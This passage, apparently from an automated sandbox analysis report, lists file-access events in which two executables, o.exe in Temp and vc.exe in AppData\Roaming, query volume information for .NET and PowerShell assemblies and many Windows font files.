Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Users\user\AppData\Roaming\vc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
